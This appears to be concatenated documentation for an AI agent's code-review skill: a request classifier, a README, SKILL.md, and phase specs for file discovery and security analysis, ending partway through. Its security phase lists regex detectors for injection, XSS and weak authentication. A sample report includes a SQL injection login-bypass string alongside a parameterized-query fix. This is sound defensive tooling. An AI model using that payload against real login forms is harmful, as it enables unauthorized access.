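  // Build a key from the classifier result; fall back to the safest chain
  const key = intent.mode ? `${intent.type}:${intent.mode}`
    : intent.complexity ? `${intent.type}:${intent.complexity}`
    : intent.type;
  return WORKFLOW_MATRIX[key] || WORKFLOW_MATRIX['feature:low'];
}
```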
## Confidence Levels
| Level | Description | Action |
|-------|-------------|--------|
| **high** | Multiple strong indicators match | Direct dispatch |
| **medium** | Some indicators match | Confirm with user |
| **low** | Fallback classification | Always confirm |
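Acting on these levels can be sketched as follows; `execute` and `confirmWithUser` are hypothetical helpers, not defined in this spec.

```javascript
// Confidence-gated dispatch: high confidence runs directly,
// medium/low confirm with the user first (per the table above).
async function dispatchWithConfidence(result, execute, confirmWithUser) {
  if (result.confidence === 'high') return execute(result);
  const ok = await confirmWithUser(result);
  return ok ? execute(result) : null;
}
```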
## Tool Preference Detection
```javascript
const TOOL_PREFERENCES = {
gemini: {
pattern: /用\s*gemini|gemini\s*(分析|理解|设计)|让\s*gemini/i,
capability: 'analysis'
},
qwen: {
pattern: /用\s*qwen|qwen\s*(分析|评估)|让\s*qwen/i,
capability: 'analysis'
},
codex: {
pattern: /用\s*codex|codex\s*(实现|重构|修复)|让\s*codex/i,
capability: 'implementation'
}
}
function detectToolPreference(text) {
for (const [tool, config] of Object.entries(TOOL_PREFERENCES)) {
if (config.pattern.test(text)) {
return { tool, capability: config.capability }
}
}
return null
}
```
## Multi-Tool Collaboration Detection
```javascript
const COLLABORATION_PATTERNS = {
sequential: /先.*(分析|理解).*然后.*(实现|重构)|分析.*后.*实现/i,
parallel: /(同时|并行).*(分析|实现)|一边.*一边/i,
hybrid: /(分析|设计).*和.*(实现|测试).*分开/i
}
function detectCollaboration(text) {
if (COLLABORATION_PATTERNS.sequential.test(text)) {
return { mode: 'sequential', description: 'Analysis first, then implementation' }
}
if (COLLABORATION_PATTERNS.parallel.test(text)) {
return { mode: 'parallel', description: 'Concurrent analysis and implementation' }
}
if (COLLABORATION_PATTERNS.hybrid.test(text)) {
return { mode: 'hybrid', description: 'Mixed parallel and sequential' }
}
return null
}
```
## Classification Pipeline
```javascript
function classify(userInput) {
const text = userInput.trim()
// Step 1: Check explicit commands
if (/^\/(?:workflow|issue|memory|task):/.test(text)) {
return { type: 'explicit', command: text }
}
// Step 2: Priority-based classification
const bugResult = detectBug(text)
if (bugResult) return bugResult
const issueResult = detectIssueBatch(text)
if (issueResult) return issueResult
const explorationResult = detectExploration(text)
if (explorationResult) return explorationResult
const uiResult = detectUI(text)
if (uiResult) return uiResult
// Step 3: Complexity-based fallback
const complexity = assessComplexity(text)
return {
type: 'feature',
complexity,
workflow: complexity === 'high' ? 'coupled' : 'rapid',
confidence: 'low'
}
}
```
## Examples
### Input → Classification
| Input | Classification | Workflow |
|-------|----------------|----------|
| "用户登录失败401错误" | bugfix/standard | lite-fix |
| "紧急:支付网关挂了" | bugfix/hotfix | lite-fix --hotfix |
| "批量处理这些 GitHub issues" | issue | issue:plan → queue |
| "不确定要怎么设计缓存系统" | exploration | brainstorm → plan |
| "添加一个深色模式切换按钮" | ui | ui-design → plan |
| "重构整个认证模块" | feature/high | plan → verify |
| "添加用户头像功能" | feature/low | lite-plan |

# Code Reviewer Skill
A comprehensive code review skill for identifying security vulnerabilities and best practices violations.
## Overview
The **code-reviewer** skill provides automated code review capabilities covering:
- **Security Analysis**: OWASP Top 10, CWE Top 25, language-specific vulnerabilities
- **Code Quality**: Naming conventions, complexity, duplication, dead code
- **Performance**: N+1 queries, inefficient algorithms, memory leaks
- **Maintainability**: Documentation, test coverage, dependency health
## Quick Start
### Basic Usage
```bash
# Review entire codebase
/code-reviewer
# Review specific directory
/code-reviewer --scope src/auth
# Focus on security only
/code-reviewer --focus security
# Focus on best practices only
/code-reviewer --focus best-practices
```
### Advanced Options
```bash
# Review with custom severity threshold
/code-reviewer --severity critical,high
# Review specific file types
/code-reviewer --languages typescript,python
# Generate detailed report
/code-reviewer --report-level detailed
# Resume from previous session
/code-reviewer --resume
```
## Features
### Security Analysis
**OWASP Top 10 2021 Coverage**
- Injection vulnerabilities (SQL, Command, XSS)
- Authentication & authorization flaws
- Sensitive data exposure
- Security misconfiguration
- And more...
**CWE Top 25 Coverage**
- Cross-site scripting (CWE-79)
- SQL injection (CWE-89)
- Command injection (CWE-78)
- Input validation (CWE-20)
- And more...
**Language-Specific Checks**
- JavaScript/TypeScript: prototype pollution, eval usage
- Python: pickle vulnerabilities, command injection
- Java: deserialization, XXE
- Go: race conditions, memory leaks
### Best Practices Review
**Code Quality**
- Naming convention compliance
- Cyclomatic complexity analysis
- Code duplication detection
- Dead code identification
**Performance**
- N+1 query detection
- Inefficient algorithm patterns
- Memory leak detection
- Resource cleanup verification
**Maintainability**
- Documentation coverage
- Test coverage analysis
- Dependency health check
- Error handling review
## Output
The skill generates comprehensive reports in `.code-review/` directory:
```
.code-review/
├── inventory.json # File inventory with metadata
├── security-findings.json # Security vulnerabilities
├── best-practices-findings.json # Best practices violations
├── summary.json # Summary statistics
├── REPORT.md # Comprehensive markdown report
└── FIX-CHECKLIST.md # Actionable fix checklist
```
### Report Contents
**REPORT.md** includes:
- Executive summary with risk assessment
- Quality scores (Security, Code Quality, Performance, Maintainability)
- Detailed findings organized by severity
- Code examples with fix recommendations
- Action plan prioritized by urgency
- Compliance status (PCI DSS, HIPAA, GDPR, SOC 2)
**FIX-CHECKLIST.md** provides:
- Checklist format for tracking fixes
- Organized by severity (Critical → Low)
- Effort estimates for each issue
- Priority assignments
## Configuration
Create `.code-reviewer.json` in project root:
```json
{
"scope": {
"include": ["src/**/*", "lib/**/*"],
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
},
"security": {
"enabled": true,
"checks": ["owasp-top-10", "cwe-top-25"],
"severity_threshold": "medium"
},
"best_practices": {
"enabled": true,
"code_quality": true,
"performance": true,
"maintainability": true
},
"reporting": {
"format": "markdown",
"output_path": ".code-review/",
"include_snippets": true,
"include_fixes": true
}
}
```
## Workflow
### Phase 1: Code Discovery
- Discover and categorize code files
- Extract metadata (LOC, complexity, framework)
- Prioritize files (Critical, High, Medium, Low)
### Phase 2: Security Analysis
- Scan for OWASP Top 10 vulnerabilities
- Check CWE Top 25 weaknesses
- Apply language-specific security patterns
- Generate security findings
### Phase 3: Best Practices Review
- Analyze code quality issues
- Detect performance problems
- Assess maintainability concerns
- Generate best practices findings
### Phase 4: Report Generation
- Consolidate all findings
- Calculate quality scores
- Generate comprehensive reports
- Create actionable checklists
## Integration
### Pre-commit Hook
Block commits with critical/high issues:
```bash
#!/bin/bash
# .git/hooks/pre-commit
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
ccw run code-reviewer --scope "$staged_files" --severity critical,high
if [ $? -ne 0 ]; then
echo "❌ Code review found critical/high issues. Commit aborted."
exit 1
fi
```
### CI/CD Integration
```yaml
# .github/workflows/code-review.yml
name: Code Review
on: [pull_request]
jobs:
review:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run Code Review
run: |
ccw run code-reviewer --report-level detailed
ccw report upload .code-review/report.md
```
## Examples
### Example 1: Security-Focused Review
```bash
# Review authentication module for security issues
/code-reviewer --scope src/auth --focus security --severity critical,high
```
**Output**: Security findings with OWASP/CWE mappings and fix recommendations
### Example 2: Performance Review
```bash
# Review API endpoints for performance issues
/code-reviewer --scope src/api --focus best-practices --check performance
```
**Output**: N+1 queries, inefficient algorithms, memory leak detections
### Example 3: Full Project Audit
```bash
# Comprehensive review of entire codebase
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
```
**Output**: Complete audit with all findings, scores, and action plan
## Compliance Support
The skill maps findings to compliance requirements:
- **PCI DSS**: Requirement 6.5 (Common coding vulnerabilities)
- **HIPAA**: Technical safeguards and access controls
- **GDPR**: Article 32 (Security of processing)
- **SOC 2**: Security controls and monitoring
## Architecture
### Execution Mode
**Sequential** - Fixed phase order for systematic review:
1. Code Discovery → 2. Security Analysis → 3. Best Practices → 4. Report Generation
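The fixed phase order above can be sketched as a minimal sequential runner. This is illustrative only: the phase functions and the shared state object are assumptions, not the skill's actual engine.

```javascript
// Run phases in fixed order, threading a shared state object through.
// Each phase (sync or async) receives the state and returns the updated state.
async function runReview(phases, state = {}) {
  for (const phase of phases) {
    state = await phase(state);
  }
  return state;
}
```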
### Tools Used
- `mcp__ace-tool__search_context` - Semantic code search
- `mcp__ccw-tools__smart_search` - Pattern matching
- `Read` - File content access
- `Write` - Report generation
## Quality Standards
### Scoring System
```
Overall Score = (
Security Score × 0.4 +
Code Quality Score × 0.25 +
Performance Score × 0.2 +
Maintainability Score × 0.15
)
```
### Score Ranges
- **A (90-100)**: Excellent - Production ready
- **B (80-89)**: Good - Minor improvements needed
- **C (70-79)**: Acceptable - Some issues to address
- **D (60-69)**: Poor - Significant improvements required
- **F (0-59)**: Failing - Major issues, not production ready
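The weighted formula and grade bands above, expressed as functions (a direct transcription; the function and field names are illustrative):

```javascript
// Weighted overall score: Security 40%, Code Quality 25%,
// Performance 20%, Maintainability 15%.
function overallScore(s) {
  return s.security * 0.4 + s.codeQuality * 0.25
       + s.performance * 0.2 + s.maintainability * 0.15;
}

// Map a 0-100 score onto the A-F ranges listed above.
function grade(score) {
  if (score >= 90) return 'A';
  if (score >= 80) return 'B';
  if (score >= 70) return 'C';
  if (score >= 60) return 'D';
  return 'F';
}
```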
## Troubleshooting
### Large Codebase
If review takes too long:
```bash
# Review in batches
/code-reviewer --scope src/module-1
/code-reviewer --scope src/module-2 --resume
# Or use parallel execution
/code-reviewer --parallel 4
```
### False Positives
Configure suppressions in `.code-reviewer.json`:
```json
{
"suppressions": {
"security": {
"sql-injection": {
"paths": ["src/legacy/**/*"],
"reason": "Legacy code, scheduled for refactor"
}
}
}
}
```
## File Structure
```
.claude/skills/code-reviewer/
├── SKILL.md # Main skill documentation
├── README.md # This file
├── phases/
│ ├── 01-code-discovery.md
│ ├── 02-security-analysis.md
│ ├── 03-best-practices-review.md
│ └── 04-report-generation.md
├── specs/
│ ├── security-requirements.md
│ ├── best-practices-requirements.md
│ └── quality-standards.md
└── templates/
├── security-finding.md
├── best-practice-finding.md
└── report-template.md
```
## Version
**v1.0.0** - Initial release
## License
MIT License

---
name: code-reviewer
description: Comprehensive code review skill for identifying security vulnerabilities and best practices violations. Triggers on "code review", "review code", "security audit", "代码审查".
allowed-tools: Read, Glob, Grep, mcp__ace-tool__search_context, mcp__ccw-tools__smart_search
---
# Code Reviewer
Comprehensive code review skill for identifying security vulnerabilities and best practices violations.
## Architecture Overview
```
┌─────────────────────────────────────────────────────────────────┐
│                     Code Reviewer Workflow                      │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  Phase 1: Code Discovery  →  Discover code files to review      │
│           & Scoping          - Identify files by language/      │
│           ↓                    framework                        │
│                              - Set review scope and priority    │
│                                                                 │
│  Phase 2: Security        →  Security vulnerability scan        │
│           Analysis           - OWASP Top 10 checks              │
│           ↓                  - Common vulnerability patterns    │
│                              - Sensitive data exposure checks   │
│                                                                 │
│  Phase 3: Best Practices  →  Best practices review              │
│           Review             - Code quality checks              │
│           ↓                  - Performance suggestions          │
│                              - Maintainability assessment       │
│                                                                 │
│  Phase 4: Report          →  Generate review report             │
│           Generation         - Group issues by severity         │
│                              - Fix suggestions and examples     │
│                              - Trackable fix checklist          │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
```
## Features
### Security Analysis
- **OWASP Top 10 Coverage**
- Injection vulnerabilities (SQL, Command, LDAP)
- Authentication & authorization bypass
- Sensitive data exposure
- XML External Entities (XXE)
- Broken access control
- Security misconfiguration
- Cross-Site Scripting (XSS)
- Insecure deserialization
- Components with known vulnerabilities
- Insufficient logging & monitoring
- **Language-Specific Checks**
- JavaScript/TypeScript: prototype pollution, eval usage
- Python: pickle vulnerabilities, command injection
- Java: deserialization, path traversal
- Go: race conditions, memory leaks
### Best Practices Review
- **Code Quality**
- Naming conventions
- Function complexity (cyclomatic complexity)
- Code duplication
- Dead code detection
- **Performance**
- N+1 queries
- Inefficient algorithms
- Memory leaks
- Resource cleanup
- **Maintainability**
- Documentation quality
- Test coverage
- Error handling patterns
- Dependency management
## Usage
### Basic Review
```bash
# Review entire codebase
/code-reviewer
# Review specific directory
/code-reviewer --scope src/auth
# Focus on security only
/code-reviewer --focus security
# Focus on best practices only
/code-reviewer --focus best-practices
```
### Advanced Options
```bash
# Review with custom severity threshold
/code-reviewer --severity critical,high
# Review specific file types
/code-reviewer --languages typescript,python
# Generate detailed report with code snippets
/code-reviewer --report-level detailed
# Resume from previous session
/code-reviewer --resume
```
## Configuration
Create `.code-reviewer.json` in project root:
```json
{
"scope": {
"include": ["src/**/*", "lib/**/*"],
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
},
"security": {
"enabled": true,
"checks": ["owasp-top-10", "cwe-top-25"],
"severity_threshold": "medium"
},
"best_practices": {
"enabled": true,
"code_quality": true,
"performance": true,
"maintainability": true
},
"reporting": {
"format": "markdown",
"output_path": ".code-review/",
"include_snippets": true,
"include_fixes": true
}
}
```
## Output
### Review Report Structure
```markdown
# Code Review Report
## Executive Summary
- Total Issues: 42
- Critical: 3
- High: 8
- Medium: 15
- Low: 16
## Security Findings
### [CRITICAL] SQL Injection in User Query
**File**: src/auth/user-service.ts:145
**Issue**: Unsanitized user input in SQL query
**Fix**: Use parameterized queries
Code Snippet:
\`\`\`typescript
// ❌ Vulnerable
const query = `SELECT * FROM users WHERE username = '${username}'`;
// ✅ Fixed
const query = 'SELECT * FROM users WHERE username = ?';
db.execute(query, [username]);
\`\`\`
## Best Practices Findings
### [MEDIUM] High Cyclomatic Complexity
**File**: src/utils/validator.ts:78
**Issue**: Function has complexity score of 15 (threshold: 10)
**Fix**: Break into smaller functions
...
```
## Phase Documentation
| Phase | Description | Output |
|-------|-------------|--------|
| [01-code-discovery.md](phases/01-code-discovery.md) | Discover and categorize code files | File inventory with metadata |
| [02-security-analysis.md](phases/02-security-analysis.md) | Analyze security vulnerabilities | Security findings list |
| [03-best-practices-review.md](phases/03-best-practices-review.md) | Review code quality and practices | Best practices findings |
| [04-report-generation.md](phases/04-report-generation.md) | Generate comprehensive report | Markdown report |
## Specifications
- [specs/security-requirements.md](specs/security-requirements.md) - Security check specifications
- [specs/best-practices-requirements.md](specs/best-practices-requirements.md) - Best practices standards
- [specs/quality-standards.md](specs/quality-standards.md) - Overall quality standards
- [specs/severity-classification.md](specs/severity-classification.md) - Issue severity criteria
## Templates
- [templates/security-finding.md](templates/security-finding.md) - Security finding template
- [templates/best-practice-finding.md](templates/best-practice-finding.md) - Best practice finding template
- [templates/report-template.md](templates/report-template.md) - Final report template
## Integration with Development Workflow
### Pre-commit Hook
```bash
#!/bin/bash
# .git/hooks/pre-commit
# Run code review on staged files
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
ccw run code-reviewer --scope "$staged_files" --severity critical,high
if [ $? -ne 0 ]; then
echo "❌ Code review found critical/high issues. Commit aborted."
exit 1
fi
```
### CI/CD Integration
```yaml
# .github/workflows/code-review.yml
name: Code Review
on: [pull_request]
jobs:
review:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run Code Review
run: |
ccw run code-reviewer --report-level detailed
ccw report upload .code-review/report.md
```
## Examples
### Example 1: Security-Focused Review
```bash
# Review authentication module for security issues
/code-reviewer --scope src/auth --focus security --severity critical,high
```
### Example 2: Performance Review
```bash
# Review API endpoints for performance issues
/code-reviewer --scope src/api --focus best-practices --check performance
```
### Example 3: Full Project Audit
```bash
# Comprehensive review of entire codebase
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
```
## Troubleshooting
### Large Codebase
If review takes too long:
```bash
# Review in batches
/code-reviewer --scope src/module-1
/code-reviewer --scope src/module-2 --resume
# Or use parallel execution
/code-reviewer --parallel 4
```
### False Positives
Configure suppressions in `.code-reviewer.json`:
```json
{
"suppressions": {
"security": {
"sql-injection": {
"paths": ["src/legacy/**/*"],
"reason": "Legacy code, scheduled for refactor"
}
}
}
}
```
## Roadmap
- [ ] AI-powered vulnerability detection
- [ ] Integration with popular security scanners (Snyk, SonarQube)
- [ ] Automated fix suggestions with diffs
- [ ] IDE plugins for real-time feedback
- [ ] Custom rule engine for organization-specific policies
## License
MIT License - See LICENSE file for details

# Phase 1: Code Discovery & Scoping
## Objective
Discover and categorize all code files within the specified scope, preparing them for security analysis and best practices review.
## Input
- **User Arguments**:
- `--scope`: Directory or file patterns (default: entire project)
- `--languages`: Specific languages to review (e.g., typescript, python, java)
- `--exclude`: Patterns to exclude (e.g., test files, node_modules)
- **Configuration**: `.code-reviewer.json` (if exists)
## Process
### Step 1: Load Configuration
```javascript
// Check for project-level configuration
const configPath = path.join(projectRoot, '.code-reviewer.json');
const config = fileExists(configPath)
? JSON.parse(readFile(configPath))
: getDefaultConfig();
// Merge user arguments with config
const scope = args.scope || config.scope.include;
const exclude = args.exclude || config.scope.exclude;
const languages = args.languages || config.languages || 'auto';
```
### Step 2: Discover Files
Use MCP tools for efficient file discovery:
```javascript
// Use smart_search for file discovery
const files = await mcp__ccw_tools__smart_search({
action: "find_files",
pattern: scope,
includeHidden: false
});
// Apply exclusion patterns
const filteredFiles = files.filter(file => {
return !exclude.some(pattern => minimatch(file, pattern));
});
```
### Step 3: Categorize Files
Categorize files by:
- **Language/Framework**: TypeScript, Python, Java, Go, etc.
- **File Type**: Source, config, test, build
- **Priority**: Critical (auth, payment), High (API), Medium (utils), Low (docs)
```javascript
const inventory = {
critical: {
auth: ['src/auth/login.ts', 'src/auth/jwt.ts'],
payment: ['src/payment/stripe.ts'],
},
high: {
api: ['src/api/users.ts', 'src/api/orders.ts'],
database: ['src/db/queries.ts'],
},
medium: {
utils: ['src/utils/validator.ts'],
services: ['src/services/*.ts'],
},
low: {
types: ['src/types/*.ts'],
}
};
```
### Step 4: Extract Metadata
For each file, extract:
- **Lines of Code (LOC)**
- **Complexity Indicators**: Function count, class count
- **Dependencies**: Import statements
- **Framework Detection**: Express, React, Django, etc.
```javascript
const metadata = files.map(file => ({
path: file,
language: detectLanguage(file),
loc: countLines(file),
complexity: estimateComplexity(file),
framework: detectFramework(file),
priority: categorizePriority(file)
}));
```
## Output
### File Inventory
Save to `.code-review/inventory.json`:
```json
{
"scan_date": "2024-01-15T10:30:00Z",
"total_files": 247,
"by_language": {
"typescript": 185,
"python": 42,
"javascript": 15,
"go": 5
},
"by_priority": {
"critical": 12,
"high": 45,
"medium": 120,
"low": 70
},
"files": [
{
"path": "src/auth/login.ts",
"language": "typescript",
"loc": 245,
"functions": 8,
"classes": 2,
"priority": "critical",
"framework": "express",
"dependencies": ["bcrypt", "jsonwebtoken", "express"]
}
]
}
```
### Summary Report
```markdown
## Code Discovery Summary
**Scope**: src/**/*
**Total Files**: 247
**Languages**: TypeScript (75%), Python (17%), JavaScript (6%), Go (2%)
### Priority Distribution
- Critical: 12 files (authentication, payment processing)
- High: 45 files (API endpoints, database queries)
- Medium: 120 files (utilities, services)
- Low: 70 files (types, configs)
### Key Areas Identified
1. **Authentication Module** (src/auth/) - 12 files, 2,400 LOC
2. **Payment Processing** (src/payment/) - 5 files, 1,200 LOC
3. **API Layer** (src/api/) - 35 files, 5,600 LOC
4. **Database Layer** (src/db/) - 8 files, 1,800 LOC
**Next Phase**: Security Analysis on Critical + High priority files
```
## State Management
Save phase state for potential resume:
```json
{
"phase": "01-code-discovery",
"status": "completed",
"timestamp": "2024-01-15T10:35:00Z",
"output": {
"inventory_path": ".code-review/inventory.json",
"total_files": 247,
"critical_files": 12,
"high_files": 45
}
}
```
## Agent Instructions
```markdown
You are in Phase 1 of the Code Review workflow. Your task is to discover and categorize code files.
**Instructions**:
1. Use mcp__ccw_tools__smart_search with action="find_files" to discover files
2. Apply exclusion patterns from config or arguments
3. Categorize files by language, type, and priority
4. Extract basic metadata (LOC, complexity indicators)
5. Save inventory to .code-review/inventory.json
6. Generate summary report
7. Proceed to Phase 2 with critical + high priority files
**Tools Available**:
- mcp__ccw_tools__smart_search (file discovery)
- Read (read configuration and sample files)
- Write (save inventory and reports)
**Output Requirements**:
- inventory.json with complete file list and metadata
- Summary markdown report
- State file for phase tracking
```
## Error Handling
### No Files Found
```javascript
if (filteredFiles.length === 0) {
throw new Error(`No files found matching scope: ${scope}
Suggestions:
- Check if scope pattern is correct
- Verify exclude patterns are not too broad
- Ensure project has code files in specified scope
`);
}
```
### Large Codebase
```javascript
if (filteredFiles.length > 1000) {
console.warn(`⚠️ Large codebase detected (${filteredFiles.length} files)`);
console.log(`Consider using --scope to review in batches`);
// Offer to focus on critical/high priority only
const answer = await askUser("Review critical/high priority files only?");
if (answer === 'yes') {
filteredFiles = filteredFiles.filter(f =>
f.priority === 'critical' || f.priority === 'high'
);
}
}
```
## Validation
Before proceeding to Phase 2:
- ✅ Inventory file created
- ✅ At least one file categorized as critical or high priority
- ✅ Metadata extracted for all files
- ✅ Summary report generated
- ✅ State saved for resume capability
## Next Phase
**Phase 2: Security Analysis** - Analyze critical and high priority files for security vulnerabilities using OWASP Top 10 and CWE Top 25 checks.

# Phase 2: Security Analysis
## Objective
Analyze code files for security vulnerabilities based on OWASP Top 10, CWE Top 25, and language-specific security patterns.
## Input
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
- **Priority Focus**: Critical and High priority files (unless `--scope all`)
- **User Arguments**:
- `--focus security`: Security-only mode
- `--severity critical,high,medium,low`: Minimum severity to report
- `--checks`: Specific security checks to run (e.g., sql-injection, xss)
## Process
### Step 1: Load Security Rules
```javascript
// Load security check definitions
const securityRules = {
owasp_top_10: [
'injection',
'broken_authentication',
'sensitive_data_exposure',
'xxe',
'broken_access_control',
'security_misconfiguration',
'xss',
'insecure_deserialization',
'vulnerable_components',
'insufficient_logging'
],
cwe_top_25: [
'cwe-79', // XSS
'cwe-89', // SQL Injection
'cwe-20', // Improper Input Validation
'cwe-78', // OS Command Injection
'cwe-190', // Integer Overflow
// ... more CWE checks
]
};
// Load language-specific rules
const languageRules = {
typescript: require('./rules/typescript-security.json'),
python: require('./rules/python-security.json'),
java: require('./rules/java-security.json'),
go: require('./rules/go-security.json'),
};
```
### Step 2: Analyze Files for Vulnerabilities
For each file in the inventory, perform security analysis:
```javascript
const findings = [];
for (const file of inventory.files) {
if (file.priority !== 'critical' && file.priority !== 'high') continue;
// Read file content
const content = await Read({ file_path: file.path });
// Run security checks
const fileFindings = await runSecurityChecks(content, file, {
rules: securityRules,
languageRules: languageRules[file.language],
severity: args.severity || 'medium'
});
findings.push(...fileFindings);
}
```
### Step 3: Security Check Patterns
#### A. Injection Vulnerabilities
**SQL Injection**:
```javascript
// Pattern: String concatenation in SQL queries
const sqlInjectionPatterns = [
/SELECT.*\$\{.*\}/, // Template literal interpolated into a SELECT
/"SELECT.*\+\s*\w+/, // String concatenation
/execute\([`'"].*\$\{.*\}.*[`'"]\)/, // Parameterized query bypass
/query\(.*\+.*\)/, // Query concatenation
];
// Check code
for (const pattern of sqlInjectionPatterns) {
const matches = content.matchAll(new RegExp(pattern, 'g'));
for (const match of matches) {
findings.push({
type: 'sql-injection',
severity: 'critical',
line: getLineNumber(content, match.index),
code: match[0],
file: file.path,
message: 'Potential SQL injection vulnerability',
recommendation: 'Use parameterized queries or ORM methods',
cwe: 'CWE-89',
owasp: 'A03:2021 - Injection'
});
}
}
```
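`getLineNumber` is used in the findings loop but not defined; a minimal sketch:

```javascript
// 1-based line number of a character offset: count newlines before it.
function getLineNumber(content, index) {
  return content.slice(0, index).split('\n').length;
}
```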
**Command Injection**:
```javascript
// Pattern: Unsanitized input in exec/spawn
const commandInjectionPatterns = [
/exec\(.*\$\{.*\}/, // exec with template literal
/spawn\(.*,\s*\[.*\$\{.*\}.*\]\)/, // spawn with unsanitized args
/execSync\(.*\+.*\)/, // execSync with concatenation
];
```
**XSS (Cross-Site Scripting)**:
```javascript
// Pattern: Unsanitized user input in DOM/HTML
const xssPatterns = [
/innerHTML\s*=.*\$\{.*\}/, // innerHTML with template literal
/dangerouslySetInnerHTML/, // React dangerous prop
/document\.write\(.*\)/, // document.write
/<\w+.*\$\{.*\}.*>/, // JSX with unsanitized data
];
```
#### B. Authentication & Authorization
```javascript
// Pattern: Weak authentication
const authPatterns = [
/password\s*===?\s*['"]/, // Hardcoded password comparison
/jwt\.sign\(.*,\s*['"][^'"]{1,16}['"]\)/, // Weak JWT secret
/bcrypt\.hash\(.*,\s*[1-9]\s*\)/, // Low bcrypt rounds
/md5\(.*password.*\)/, // MD5 for passwords
/if\s*\(\s*user\s*\)\s*\{/, // Truthiness-only check instead of a real authorization check
];
// Check for missing authorization
const authzPatterns = [
/router\.(get|post|put|delete)\(.*\)\s*=>/, // No middleware
/app\.use\([^)]*\)\s*;(?!.*auth)/, // Missing auth middleware
];
```
#### C. Sensitive Data Exposure
```javascript
// Pattern: Sensitive data in logs/responses
const sensitiveDataPatterns = [
/(password|secret|token|key)\s*:/i, // Sensitive keys in objects
/console\.log\(.*password.*\)/i, // Password in logs
/res\.send\(.*user.*password.*\)/, // Password in response
/(api_key|apikey)\s*=\s*['"]/i, // Hardcoded API keys
];
```
#### D. Security Misconfiguration
```javascript
// Pattern: Insecure configurations
const misconfigPatterns = [
/cors\(\{.*origin:\s*['"]?\*['"]?.*\}\)/, // CORS wildcard
/https?\s*:\s*false/, // HTTPS disabled
/helmet\(\)/, // helmet() called with default, unconfigured options
/strictMode\s*:\s*false/, // Strict mode disabled
];
```
### Step 4: Language-Specific Checks
**TypeScript/JavaScript**:
```javascript
const jsFindings = [
checkPrototypePollution(content),
checkEvalUsage(content),
checkUnsafeRegex(content),
checkWeakCrypto(content),
];
```
**Python**:
```javascript
const pythonFindings = [
checkPickleVulnerabilities(content),
checkYamlUnsafeLoad(content),
checkSqlAlchemy(content),
checkFlaskSecurityHeaders(content),
];
```
**Java**:
```javascript
const javaFindings = [
checkDeserialization(content),
checkXXE(content),
checkPathTraversal(content),
checkSQLInjection(content),
];
```
**Go**:
```javascript
const goFindings = [
checkRaceConditions(content),
checkSQLInjection(content),
checkPathTraversal(content),
checkCryptoWeakness(content),
];
```
## Output
### Security Findings File
Save to `.code-review/security-findings.json`:
```json
{
"scan_date": "2024-01-15T11:00:00Z",
"total_findings": 24,
"by_severity": {
"critical": 3,
"high": 8,
"medium": 10,
"low": 3
},
"by_category": {
"injection": 5,
"authentication": 3,
"data_exposure": 4,
"misconfiguration": 6,
"xss": 3,
"other": 3
},
"findings": [
{
"id": "SEC-001",
"type": "sql-injection",
"severity": "critical",
"file": "src/auth/user-service.ts",
"line": 145,
"column": 12,
"code": "const query = `SELECT * FROM users WHERE username = '${username}'`;",
"message": "SQL Injection vulnerability: User input directly concatenated in SQL query",
"cwe": "CWE-89",
"owasp": "A03:2021 - Injection",
"recommendation": {
"description": "Use parameterized queries to prevent SQL injection",
"fix_example": "const query = 'SELECT * FROM users WHERE username = ?';\ndb.execute(query, [username]);"
},
"references": [
"https://owasp.org/www-community/attacks/SQL_Injection",
"https://cwe.mitre.org/data/definitions/89.html"
]
}
]
}
```
### Security Report
Generate markdown report:
```markdown
# Security Analysis Report
**Scan Date**: 2024-01-15 11:00:00
**Files Analyzed**: 57 (Critical + High priority)
**Total Findings**: 24
## Severity Summary
| Severity | Count | Percentage |
|----------|-------|------------|
| Critical | 3 | 12.5% |
| High | 8 | 33.3% |
| Medium | 10 | 41.7% |
| Low | 3 | 12.5% |
## Critical Findings (Require Immediate Action)
### 🔴 [SEC-001] SQL Injection in User Authentication
**File**: `src/auth/user-service.ts:145`
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
**Vulnerable Code**:
\`\`\`typescript
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
const user = await db.execute(query);
\`\`\`
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands.
**Attack Example**:
\`\`\`
username: ' OR '1'='1' --
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
Effect: Bypasses authentication, returns all users
\`\`\`
**Recommended Fix**:
\`\`\`typescript
// Use parameterized queries
const query = 'SELECT * FROM users WHERE username = ?';
const user = await db.execute(query, [username]);
// Or use ORM
const user = await User.findOne({ where: { username } });
\`\`\`
**References**:
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
---
### 🔴 [SEC-002] Hardcoded JWT Secret
**File**: `src/auth/jwt.ts:23`
**CWE**: CWE-798 | **OWASP**: A07:2021 - Identification and Authentication Failures
**Vulnerable Code**:
\`\`\`typescript
const token = jwt.sign(payload, 'mysecret123', { expiresIn: '1h' });
\`\`\`
**Issue**: JWT secret is hardcoded and weak (only 11 characters).
**Recommended Fix**:
\`\`\`typescript
// Use environment variable with strong secret
const token = jwt.sign(payload, process.env.JWT_SECRET, {
expiresIn: '1h',
algorithm: 'HS256'
});
// Generate strong secret (32+ bytes):
// node -e "console.log(require('crypto').randomBytes(32).toString('hex'))"
\`\`\`
---
## High Findings
### 🟠 [SEC-003] Missing Input Validation
**File**: `src/api/users.ts:67`
**CWE**: CWE-20 | **OWASP**: A03:2021 - Injection
...
## Medium Findings
...
## Remediation Priority
1. **Critical (3)**: Fix within 24 hours
2. **High (8)**: Fix within 1 week
3. **Medium (10)**: Fix within 1 month
4. **Low (3)**: Fix in next release
## Compliance Impact
- **PCI DSS**: 4 findings affect compliance (SEC-001, SEC-002, SEC-008, SEC-011)
- **HIPAA**: 2 findings affect compliance (SEC-005, SEC-009)
- **GDPR**: 3 findings affect compliance (SEC-002, SEC-005, SEC-007)
```
## State Management
```json
{
"phase": "02-security-analysis",
"status": "completed",
"timestamp": "2024-01-15T11:15:00Z",
